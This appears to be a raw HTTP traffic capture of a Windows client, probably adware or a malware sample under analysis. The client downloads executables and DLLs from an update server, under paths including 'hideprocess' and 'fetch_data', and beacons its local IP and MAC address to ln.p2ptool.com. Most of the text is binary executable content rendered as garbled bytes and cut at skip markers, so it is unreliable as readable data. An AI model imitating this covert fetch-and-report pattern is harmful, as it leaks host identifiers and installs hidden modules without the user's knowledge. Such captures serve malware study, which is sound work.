Date: Wed, 03 Jun 2015 02:46:44 GMT
Content-Type: application/octet-stream
Content-Length: 414887
Connection: keep-alive
X-Request-Id: e53d8163bbd3bca64131c4ac67b2412a; 9149848c88d3fd6ca3e92456c0b77697; 8dc45fba0af04f124afa4838b4ec2b90
X-Source: U/200
Last-Modified: Tue, 21 Apr 2015 09:19:56 GMT
Expires: Fri, 05 Jun 2015 10:16:32 GMT
Cache-Control: max-age=667295
Accept-Ranges: bytes
Age: 467507
X-Cache: MISS(S)|MISS from ctn-zj-hgh-092; HIT|MISS from cun-sd-tao-070; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot be run in DOS mode....$Z...dD...*......T....*.Y.....*..W..@..1........&.*..}. .Q.}...@.. ...*..r...(.1.........1.r...@Richl........PE..L.....6U.............r...p.....*.........&....a...... ....2. .U......)..,..=..........P.....C.@.........$:HC...............text...lq.......0... ..`.rdata..@U.T.PV...v.....R@..@.'....H..............%..6....rsrc......,.!.. .....P........F..h.}G......Y.....h...............................f@~G.............f..G......`...........o..f .G.._.......O.....%H.h.%H...H.G.P..L.G....I....-U......P.H.3..E..E.P..<.G..E.h..G....I.......M....3........]@..j.hjQG.d....PK.`P.E.d.....h.'H.j$h..I..E......t...3....8..'H..7....D....I.Ph......b..h..G...4.I6.....x.......M.d.....Y.....0..X..............h<.I.....(..... ....@..D@.'.. ...@.p.k...h...$..E.....j.j...:..h.L.g8.I...).....`..G..L...]........h..I........$..G..6[. h....*...........@.T.I...^....H.I....@.x.F...8...D...<...h0.I.....G..h$]. .... h...........I..%...h8...... hB......p.@.I..."..L.......-.....`...o... .......@...E..u..Z........$......\$H.D$H...-........QU..V.u...tP...r...;.u..........s....t5..:.u'...t*.A.:B.u....t..A.:B.u....t..A.:B.t......^].3.^].`..........E..t.V.b...h.^].....x....y.....U..j.h.?`.3...c.V.E.VWh.....}.j..u.....k.0.F.).r.F...F...p..3..F....Df.F..F.f.F .F$.F(.F,.F0.E....u(.E..E...H.P.M..i...h..H..E..E...H.P.jT..WV............._^.M.3..~.P......V..V......F,.....t.P.0...0.F,..2.F$.........2.F...............#..E....2.F..........#.Fs...........^.....p..
<<< skipped >>>
GET /config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:51 GMT
Content-Type: application/octet-stream
Content-Length: 16021
Connection: keep-alive
X-Request-Id: c72c8390de4e17724de7685b042d0ab3; eb12280e9a2f424ebe112d688c68fea1; f8cc4faca9efb76ee37aa23448c9214b; c5debba4eac524c91ad94922bf47e895
X-Source: U/200
Last-Modified: Tue, 28 Apr 2015 09:53:39 GMT
Expires: Sun, 07 Jun 2015 13:27:51 GMT
Cache-Control: max-age=656634
Accept-Ranges: bytes
Age: 272574
X-Cache: HIT|HIT from cache_img_86; MISS(S)|HIT from cun-sd-tao-074; MISS|HIT from usn-us-sms-098
.GEMCF...q.KQBJ!FNpm$ \OpC..Z.TSN0....Y)..M@.N.._HWoID@.R6ZW_.N..ES.K1.HB..u[ML..Y.CSRV0....7@GJY.].SHBI4.XB.A .@@L.Y.KLNT'$...R)YT.L.B.....#NFQ.G..P@R...KQ[M7V..R.f.MJUH..;.O[/...Y.=ANS...T..DU-]\Z..m.....E.XKPMnQH.Q.p@F[].]..[CS#NDXNM1C.HT.N.X.......\N.E..@PM7.RB.J?A.LN...H.A..C.l.qV...KOH..5.Y).....M"I[QQ.m.P@F._IGSJ.....P.o....S.J....s..`*OL..R......<CJD.[pMLB]S.S......JIQ.m...E.K.]UI]mW..S.k2.UB.K..~.p...P..F6..Z.po.....B~...F7V\..D4WZ.B.G.SKP.q.XBNM0RTXVO..aI%@YN.....L..W...J!RX..A3$....WLUS.F.N.C"YTX.....RBN<TE.U.)L ..V.SK..u.$.0.K...@u.CZh.._XV.._....v..@.R.S@..<V\ZNXl...B.H.A^(..~.`WH..F.$.;oVIV.17C.z.@..O.D....A.U.h...9C.@Y_.3N..X.=@_XC.D.AD.Y.]..S.o.P@..D.EX.@:HEK.\pMM.O.O.Q.ON-MWZ.Yp...V.Z.qY._7OM.R..UI^%Y.Z.I9BNV.Q)D..XD..V.]IL]H.s.....h...T.K.Y/LZ..YY..OI.Id.q..U.pM@6.q....nBH..DP@.W~.q...O7JVl...F]UR/LN..G0OM..Q$.r.^.I1[......0VQCz....FO.O.{KE.(UFA..l..DD.E...z.`Y<BLYD....NT$DS..].V..E.Q^Fd.E..J.l.B.XO/..Q.PL..H.P]1ILZ ... .....G:........Z.Xr.J.P.h....W.^....#.H...sOE$...h....^sD..R.mJ....IU..C.$.I.MH<..KGS._....#B...Hl..K.U.PE...yG..T.n..M.Y...Z._q.....:.FMD......[m..KY.=.B..V.R...."E.N..o.A..QHT....#B..RJi..N.U.VB...xE..Y.=...D.......p..HQH=K.J.Y.J.ZB.w...V.j.......F.._t.MK..jKFM.L._...^y..N.O=..M.W..G.AXt.....g...C.O.._.XqGO.TKm..ICRLP....#C....<.B..Y..._..&E....sJ.MCY.R.X.\%.H...;..LCXNQF^E.#...M.mO...QI..X.\u...!Hi....Lk.....v.jKW.n..v.`L]H.r....1q.WA.X._....u~..T.f....>.^....y..rM.f....R.8....r...Vqs....S.T.c..`E.Ao......H.OUYm...P.k..p.X.^....Z...X.g....>.^....x..rM
<<< skipped >>>
GET /dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:55 GMT
Content-Type: application/octet-stream
Content-Length: 227879
Connection: keep-alive
X-Request-Id: d5941be296a7c272f10744274c1725a2; 3d3e824cb3467a9fb63057493af2f01f; 8d24d23f7c67e8c505ebe2e94e3d5363; 405cf54c09a2caa748497801b9acab61
X-Source: U/200
Last-Modified: Tue, 20 Jan 2015 08:16:57 GMT
Expires: Mon, 08 Jun 2015 01:24:50 GMT
Cache-Control: max-age=667973
Accept-Ranges: bytes
Age: 240898
X-Cache: HIT|MISS from ctn-zj-hgh-091; HIT|HIT from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098
..MZ...................@.......-...........!..L.!This program cannot be run in DOS mode....$Z..Hv....f...Q.E.....1..G.......f..o.....1...0..g.q.f.)`.....1...0.....1.....1)`...@Richd..w.....PE..L......T.......!.....:...x.............P*.!....R..... ....2...M.b.....@5..8..1............d..........@..............4.. R..8.....:.....BP...........text....9............. ..`.rdata......Z....>).R@..@.'. ..U.. ...R.....M..(....rsrc......,..X(..@.reloc.........6...\(..BY.....)..h......\P..h.H...*...Y......j.h......d....(..h.&...&...j.j......hpH..........C...U......E.P..DP...E.h I....Q...........]r.uhPI....B. h@.......0......0.%...P...h`...k........(.....u..............hp.....!.:1. h{=..........".............h....... h.......p.......".....&........V3...tR.:.tM...&.E.PVh....VVVRQ.. P....uO.u..u..u.P.u..u....P...u......`.D....H. .^6..0.bj..u.Q/..,..&..........`V3..E.Q.@..tV...Q.E..u.Ph....Rh...........W.E...tP.u..M..u.QVVP...... .E-..P$..Q..3........U.........p ..3..E.SW..................W..|................Ph....j.WS.............P..V...I......q............@P...C.@j...L.............t:..uE.... ..%...W.......t.-......_[.M.3........].W....0...........w.........M._3.[.b......... .).. .pV.............................;.......Wj\S..V...............G..................... .;..G.....VSP..........,....B.....5:....N...F..u. ......=.....VWP..=...=...=..n..b..... ....@..3...#...............Qh....j.PV..`....3......@...............p...PW..A. .......RJ..u.".PSP.........t(G..t.3......_.#_^..".....v..G..-....-.... .^......U.............@$.E..
<<< skipped >>>
GET /fetch_data/2014-08-21_17_15_35_123/fetch_data.dll HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:00 GMT
Content-Type: application/octet-stream
Content-Length: 128931
Connection: keep-alive
X-Request-Id: 4f2430bbe391f89e8b8a81ccc80dc396; 456202ee7534af014907b39d32ee5e85
X-Source: U/200
Last-Modified: Thu, 21 Aug 2014 09:15:37 GMT
Expires: Wed, 10 Jun 2015 15:58:08 GMT
Cache-Control: max-age=672278
Accept-Ranges: bytes
Age: 20012
X-Cache: MISS|MISS from ctn-zj-hgh-093, MISS|MISS from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098
..MZ...................@.......-...........!..L.!This program cannot be run in DOS mode....$Z.............p.q.......i....1W.....V.%.....5....1%..8..........S.....j@..m..1..h..@Richd..w.....PE..L......S......!......................0.......`...........2.0.M.... @. ..,.....@...... ...h.......x..0..(.........,...02..8.....:(....B0...........text.................. ..`.rdata....................R@..@.'....\9............(....rsrc......t...(..@.reloc..............(..B......%..hp).......Y.....h`.......P........%X.......h.............|.....u......h...l...h.).....!..1. h.=..........s.............h....].. h....Q..p......."......;...}......U..j.h....d.....P...VW.p...3.P.E.d.......}..E...0.E.)..j..G......G....h<........-...}...E.(..Iv0.E..0;.t'.I.j.j..F...P.!'..j.h.......#&...6;u.u..M.......u............M.d......Y_^..]......v...j.hx..b............$....S....P..$........j....1...L$D..@....C..$.;.0..B%.1.......P........0................p.......i......D$,..$....P...0...D$.{.......0...=.0..h0......=6.............. .;L$,.......^...L$l..$....y.`...D$|....D$l... ...D$...C.D$ ...;.........D$(...1....L$(.........s.F..L$()....D$d.t$.....P..t..L$(.=3.....F8...|$t.t!.|$x....d.CD$dP.0...h.....@.........u.L$...,...Z..x.r..t$d...x.2.=4..@.........#A...D$0P.L$H..C...<........C.......$.{....D$8..P.......$..........D$D$... ..x ..L$l.......@....@...$....tbh......$.e.P.$.......P.>9......D$|..$........|Ph......$....h....P...C......6.%..6...^.._i..$.8i..d...f.MdPh0f...f...j.!;.j....@.D$xe.0.D$..a..D$d...2|.. .a.L$<.....*......-..|......
<<< skipped >>>
GET /goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:05 GMT
Content-Type: application/octet-stream
Content-Length: 252624
Connection: keep-alive
X-Request-Id: c4109171c08354e3f45a1ad9c1f52117; f79cf9d216a55a01bdd5fcf0ac5989ae; 42d75530002f19947f0d3f973db1e3b6
X-Source: U/200
Last-Modified: Wed, 04 Mar 2015 03:08:51 GMT
Expires: Wed, 10 Jun 2015 00:02:59 GMT
Cache-Control: max-age=679033
Accept-Ranges: bytes
Age: 84080
X-Cache: MISS|MISS from cache_img_87; HIT|HIT from cun-tj-tsn-073; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot be run in DOS mode....$Z..H.jt.q.'...)..'.q.'J .'......'.q.'...'.q.'.#.'/..1.'.....'.q.'...'...1.'.P.1.'.@.1.'...1.'.0.....1)....@Rich|......PE..L....t.T.......!........................:.!....R..... ....2...].q.....@.5..8..1............e..........B@...K....ZP...;......:.M...O....P.......text.................. ..`.rdata..|...Z.....).R@..@.'.0.H. .....6...M........rsrc....!@.D.-..(.`@.relo).......]<....(..BY........h.........Y.....h............o......._.......O..e@....?...&U......E.P..D....E.h.....`.............]..@.....6..h.C. .... h.......................p.l.....:..........h.....t.....$..................2.....@..!....j....X$.....P$...F...H...T...L....h@$...........h....._....%...?...h....)...f.....u......U...E..V........t.V....&.g.^]...-..0...E..U....H.].. ......U.....u.R.P..U..H.;J.u...;.u.....9."2....X.....`..;H.u...;E.u...-....`....L.......U..QV.u..E......$=...u........L...E..F......Fb.......:.u.3.QR...[.....^......W.y...A..u. ._"..9"......$.E...V{.c..u(j.u.#..w..h.L........q.uPV.:.....O...M.../n<....{o......Y"..U..V.u.V..;........E..0t..@.....^..D.@...........@.C..M.......u..9.u.3.RQ........_....W.z...Bs.!._ ... ..X.....V...~..r..6.P....j..^...#U..S.].VW...M..{.;....... .9}..B}.;.uG...9F......._....F.r...Qj........u..._..^[]........\..............F.;.s$.v...W......M...tj.{..r...e...r*...(..u..~....r..._....g.r._^[...s....t.W...PR.h.....D...~.r.....8/..,.........h M...i3...._......;'3....0...}..VW.}...t"e...r.S....t.WSV...}.AS...~.C[
<<< skipped >>>
GET /goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:13 GMT
Content-Type: application/octet-stream
Content-Length: 7776
Connection: keep-alive
X-Request-Id: a453f74a7d64b13acad0d504fc582b16; 7a396f845a2e2492b4377a23a2ac0097; 2e004e7f159702521d50c479b24d71ce; cbbc5f57908fd61fe43f33dfaf374b42
X-Source: U/200
Last-Modified: Tue, 02 Jun 2015 08:12:04 GMT
Expires: Tue, 09 Jun 2015 22:18:45 GMT
Cache-Control: max-age=655565
Accept-Ranges: bytes
Age: 66874
X-Cache: MISS|HIT from ctn-zj-hgh-096; MISS|HIT from cun-tj-tsn-075; MISS|HIT from usn-us-sms-098
...............................O)...$k....62a8^&Q23.I14.....#p...bI...).W.iXB....P..mL.$....TX"...b...... .s..m_P.\.".a......>.I.i.....F..b........"3.`xf.[.."X..w.#@P*@%...#.e.G.`L*X.A.....Y.A.....v.(..../.n..!O...]j....`\x...e..;.F.k.6..a..5......-?s....y.h..7.[.....8.......%5..q.....~2.!..a.P........9.t.. ..`Q...P......ZFC9b.Q$4L.ot.V.._..(.K|.H...B.2&..>...X...<...n..ah/..=..i.?5S.c.PA..."...4 @..B)...........,.g-hv..rh*...5...T.&uY@... |Pf..#.~.u...#..rv.t'\.dx`...............e.}C.L.........2.n=.bl..o;....#fk<O.ySh.c.....R. ...G...G...U.i.........|4...6........E)...o........E?..q!.x...............#..Z.4f..f.W...H#.....t.R.......H...u..V)D.<*V....3Y.....]...{t.T`.tw..&Jm....G...... ..f..*C....\....A....8.$............d[=.....5...*}.0....\..^....L..Eb....0......j..b.R@..]....i [I.......3........._..q......,......5o.......lh..m.|...dP,....XJ...&..O..y.............".....}|.:I.S...J.?A..dk......#6'.% 0b~....l..k.n`..-...Tmvy....:.}.t.....&..]......$........I....*.`.D.<.R...p'_Z..`..p..:.b 0.l.G.. .........;.g..x....'....a.yAU8.G...4y...{........n...!..e\F.....8.~....d...4....HX.E(e.D..0_?.I.Ml1..R.%!.{....G%E...&.u.6...s...c.........#J0d..\...n.y..X.D.9s........E...C.P..._&p.k.e.{7..p.K...Hd...Oh..j...Q........P./ <=.<..K.`.m..X.w....U<.T..$....'Ry..yb!.)Z}..__..^.e.............F.ud..F.Ri..._........]..;.....}..........D.......^/. ..}.......$.....xq.)..s..e*..'iQ....a....:...Fm.......}^....`..`<Z.......)T.>......c.../...........h....|M..5Y.F0......QA2.....HS.........H.......C....
<<< skipped >>>
GET /hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:20 GMT
Content-Type: application/octet-stream
Content-Length: 451789
Connection: keep-alive
X-Request-Id: 38052415f2f5c34fab65f2b0289cd2ce; 6b0210e182a42e6a5622ee22e84cacfa; 2c570de857ed50be654376b6abf88f3a; 84017f0f5a95c2a62480852635ed69da
X-Source: U/200
Last-Modified: Fri, 10 Oct 2014 08:08:52 GMT
Expires: Sun, 07 Jun 2015 01:09:06 GMT
Cache-Control: max-age=681976
Accept-Ranges: bytes
Age: 342272
X-Cache: MISS|HIT from ctn-zj-hgh-095; HIT|HIT from cun-tj-tsn-070; MISS|HIT from usn-us-sms-098
..MZ...................@....................!..L.!This minibox cannot be run in DOS mode....$Z..G......F...P..F...F...F......F...F. .F...F$".F...1.F.8.@.F]...1.F...1.F.....0.....@Richd..w.....PE..L......R............. ........R........0.&......@.....H....! ...Q...............4........P(...TS.R...LPl....!:.o..._0..0.J....text...6............. ..`.rdata..$..........R@..@.'.s.......T........@....rsrc....S....`......P....................O...u.3...A .......D$.P.....Y..................A j.P..p8A.,............T$..T$..p.........t....Q.P......P....<.....QV...N....PQ.D$...........t..F... ^Yk.....0...n0..._......t.P..T0A..F ...X0A..N(^.%l1A.]..%.....(.D$,.L$0.D$.3.PP.T$4R.L$.P.L$.QP.D$.(...f.D$$....& ..D$(.D$,.D:...4.D$8.D$<..P0A...(...GQ.T$.3.9L$...$....D$..D$..L$.;..L$..T$.u....P.S..U.l$.V.0W.y.U.h..@. .U .P.A..I.R.T$0V.... .P .QWSR...6A._^][Y.j.h..A.d.X...P...VW.(.A.3.P.D$.d........t$..D$(Ph.........3..N|.|$ ...:A...|1A....9....@3.....1.....p....... .`........!.................9....h..@.hp.@.j.h..........Q.D$4..E....T$.R..x8A..D$..L$..Ft.Nx...L$.d....aY_^.....Uj.h....'QV........{..v.P........$..p.......... ..9.........<.....>.2.N|.......D$................^.............Gj.h:...S........t$(3....\$....1A..|$$P.....1A..\$..\$,S{..S.@...1s...PS.....1A.P...T..AW.....0...O....0_^[...0...F.P...9A.......D$..t.V.......^g.... QV.. .........,..T$..F.....^]..p... ..V..t.....3..L$...t..I...3..T$,..... $P......(...(.......,.P.R.P.R.P...RPQ..Q.t.....F.^.(.3....v........@SU..3.9 ......9k ......W.|$T;.u=.C.P...8A...8..S..L$&
<<< skipped >>>
GET /hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:47:29 GMT
Content-Type: application/octet-stream
Content-Length: 131253
Connection: keep-alive
X-Request-Id: 5c0b395c52cb0988f35dd63948d4c9fc; bc97604dddda8a3ef0be77b0b847f417; 75fc99a2b730438414b753605f89a35d
X-Source: U/200
Last-Modified: Mon, 23 Mar 2015 03:11:59 GMT
Expires: Tue, 09 Jun 2015 11:56:15 GMT
Cache-Control: max-age=651107
Accept-Ranges: bytes
Age: 88755
X-Cache: HIT from ctn-zj-hgh-099; MISS(S)|HIT from cun-sd-tao-069; MISS|HIT from usn-us-sms-098
..MZ...................@.......-...........!..L.!This program cannot be run in DOS mode....$Z....J,..$...........$.?A....$........1........#.$......8..%...$..........8.....1.....@Richd..w.....PE..L....|.U......!.........P.....p=....... .......`...........2...M.....@5..8..1............b...T...d..BP...K.....`...#...!..8.....:`....O ...P.......text.................. ..`.rdata................R@..@.'.....|.......\....(....rsrc.... P.%.E....L.....P.areloc...P.`...1...(..B0.....*.......h......;....*..Y....uh........ hp..$.)&. h`.........9.......h........K.....&U.............3..E.h.................j.P.S....E.P.u.....P..x!.......... ...M.3........]........w..$......................Vh......j.V..~....oV4.....0..........t....t3.B......u.jxh.w..h.w...7...j7....&......3.^....F..B..F.....^[.....U..V..W...>y.Gt.jZJ. ..J...3._^]...u.j[....y.....0Sh.A...^.j.S..~..h.....C....V4.j P.s...~...M.... .........E.....0.....$....F.j&.. ...W.@.S....$..uM9%.Bt.ja..b.x...?.....8....r.jb...`..."..........3.[h....0..[..........W.}.jpj.......V.X}...G.....@.HtOHt6Ht.hX...h.|w.'....0.>...._.F`..FH......"....D...............SV...D$.].....W.\$........t.h...b.|...5..@....M...U.........;.t....;.t.h.4.c8}....4....K....w7...v....u-.......Y......s...... ...3......4.`...h.~...!-....Qh.~........R..P.......].P.......!..a...... ...3........4...;...h.~.....Q@...@.`......F.......x........................@............................tW...t.hN....!....q.............0S..g.R...h...... ..3..... .g6...*..<. h$3..,.."3.....(..^.!....1Ph,>...>. .._...
<<< skipped >>>
GET /txt/qpqpqp_201505291802.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=1FC77115C819B7258FC1528899CADE7A HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:28 GMT
Content-Type: text/plain
Content-Length: 131376
Last-Modified: Fri, 29 May 2015 10:02:33 GMT
Connection: close
ETag: "55683939-20130"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJSg1HDvu0fCwtUwmory885X0B08Nr3lSxBaIDqW2l3RvsY GH2UJAHUCXzx4 mkGqSCDSlCWbCA IgmipfV8VJlwpOcrOixJhd4iH5KuvIsTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dBT5GlbXQrd n3YNPrA6SxfVvh3CJHt4bI9xlBmLsuLjPgwpxgTHibCn0Fz4eYFSdrlycn0DaQTrWJvgEYtUqAbYm ARi1SoBtCfJw2WASts57NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrL8AYVCLiuZCCMVbBdE 4V8TazQ2ZSPlrxNrNDZlI Wvi03Nmtgxjj8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrbgZhvAzHEaPE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziEHRmRKbAnM6osYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ72jWZM7wxJ5/Dkgp0v8b7UsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWAvJ46JuW9FgLJZ8KCVZBu3E2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y0/hTLesNOU3zfwD/apg uknevZ9E Uwawl3GIUk3N3uiy6tRS5Dm3Sir1KGo8YLxbG2cKNuElZSmmL5PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>
GET /wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ HTTP/1.1
Host: app.log.soomeng.com
Connection: keep-alive
Accept: */*
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Wed, 03 Jun 2015 02:47:27 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: keep-alive
GIF89a.............!.......,...........L..;..
GET /main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat HTTP/1.1
Host: prd-update.b0.upaiyun.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: marco/0.9
Date: Wed, 03 Jun 2015 02:46:20 GMT
Content-Type: application/octet-stream
Content-Length: 648089
Connection: keep-alive
X-Request-Id: f410d7e60b27d4cece23e29d91736289; 9bc8c2544f2a3e1cbeb5bc3e10f08654
X-Source: U/200
Last-Modified: Thu, 02 Apr 2015 12:12:21 GMT
Expires: Wed, 10 Jun 2015 06:11:15 GMT
Cache-Control: max-age=657318
Accept-Ranges: bytes
Age: 247900
X-Cache: MISS|MISS from cache_img_86; MISS(S)|HIT from cun-sd-tao-073, MISS|MISS from usn-us-sms-098
..MZ...................@....................!..L.!This program cannot be run in DOS mode....$Z...N.../....Q.}n....1P.x...Q../...W"..(.........XT.. .1j.....&..1.Xo..@RichT..g.....PE..L....!.U.................@....hI..............a...... ....2.p E....!@.)..,..=..........Pd....C.@.....................8.....:.....O....P.......text...w............... ..`.rdata.....T.w.......&...."@.'....H........Z...........@....rsrc...."..t.%R.$.....P.areloc.............V(..B0.....2.U..j.h:bI.d.P..P...\.3.P.E.d...1.E......|._.P"J..E.....h..J..........M.d..(.eY..].....`..t`....`........lq.o..J..{q...p...p...xp......p..`p...p...h.._...h.J.h...V....Y..&h. ..p ... ... ..` ... ... ..P ..{ ..../............&.$....`./.....5h......0.*....%.. ... ... ...j.....J...._....h$P.j..J...0.&hD ... ..{ ..\ .. ..[ . h,...O...6...C....0i_...X..h@...-.. hJ...!..p..k_..j"..T.......hh._........$^.. .... hm.........B.....@.<._.........._......_.................0h..@.0..J............@...E..u..Z........$......\$H.D$H...z..z.....QU..V.u...tP...r...;.u..........s....t5..:.u'...t*.A.:B.u....t..A.:B.u....t..A.:B.t......^].3.^]...%.G..-QVB.S...u.6..../....E..t.V._.l...?.r^..]........Gj.h.`.._.%.M].G....L.....E.......%BH..3...R.V.E.VW......}.j..u...V......0.F.....F...E...F.......`.3..F.....f.F..E...F.f.F .E...F$.F(.E...F,.F0.E....u0.E..E...J.P.M.....K.p..E..#J......E.h..[.P.ID..WV.4R.....S..?.._^.M.3......J.....P...........{.!..m.......F,..t.P.....0.F,.....2.F$...k........2.F....P....6.B..F....5...>..Z.2.F........j.bE...F...#..........X..5U....S.....*U....
<<< skipped >>>
GET /txt/whitelist.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:33 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes
/uOrJJOQ0bgY9jPW9p1UwzlabyskyS1ciztzZWKoyggyuwDxnQlnFOPszhAwXEvEP4Ro1Ye5GacBBM2ZDNbUU Fc3f8HO2qyXYpVEjVFoWD25ZqPJsCD8qOAB wgCXdRc0XuI/c7plLEOnja3WJ0VzSoUtOuytBo9YwHKaDQwFJ/phDpH1RmCT0PpVHeHte0bQ6FPVVO1cDEHLrc9hsubAeFdijjIAUPWLKAHfO1qSVWKjPB8v18PmI56rTDucF0jCYIsKUbX/gtuw1a 1n5bL6dhDiuNvG0kRhtox0AybwbErVMBK4XrK1obf LTAlyy77 sTZ3l0ESrpR2HHdxDEue6pcfMRhz0ZQahWmq8610CX29zZYVFy8H4hihJB2wjmGLCcv6NV ggd gsC/STce7Pnc19RuUC8HVCyN90N9Y87b4rbC PHFnT9tYDoFGmyyJgRwnmH04MROJDdJzbnxsJeuN tjovl57mS39 UIxrLwWibnt/RUpHPDIFivoP1rZPgoyGyE95m/oQtasAP8QFwrqal0MMZjhYDvG0wCByOT9AZLpjIdm4QwX2q1Z1EwLsRa/RJB4wvPvo42hN5l9kVaqbU rcG/IZZBR CayLrkJrly/6psVd4mRXOidYZdVeLWvHQjqVz0y6m VA2VnWwIEb3UeVG4pHbf1sFsTIRUyA8yri1qFQdgILxA C5RvEeLlw i9JjXOrCss4pbS7Gn3dTZPy7kD7aptBNwBZ8AXyqK1lu iWTl/ WkoR9Sj3yWf5MVOHoX0VXWWxQot2/8PHlSQzDVv 2De/01k1xpsCsqniIqyltVIso5nGBEpRygNWYEN9vdk1sZugGX007PYU1RmkDJowgiCqQE3Z S8bBaOD46ikCWqMp0G9E1AeswK2Fz55zwjKvkukxSlQ 11kwxCgKRMANZGEOBE5zuEAYr1tXJIAKEkCyHgSEhnCcSms7bXzTZ K xavSklFGxxJoPGgbM9ntFXfCfCSVEg/75DV2dtPnAVPulvRG6ad9b/psmHQ87Ydux5R4nebyiCGAe8dJXk 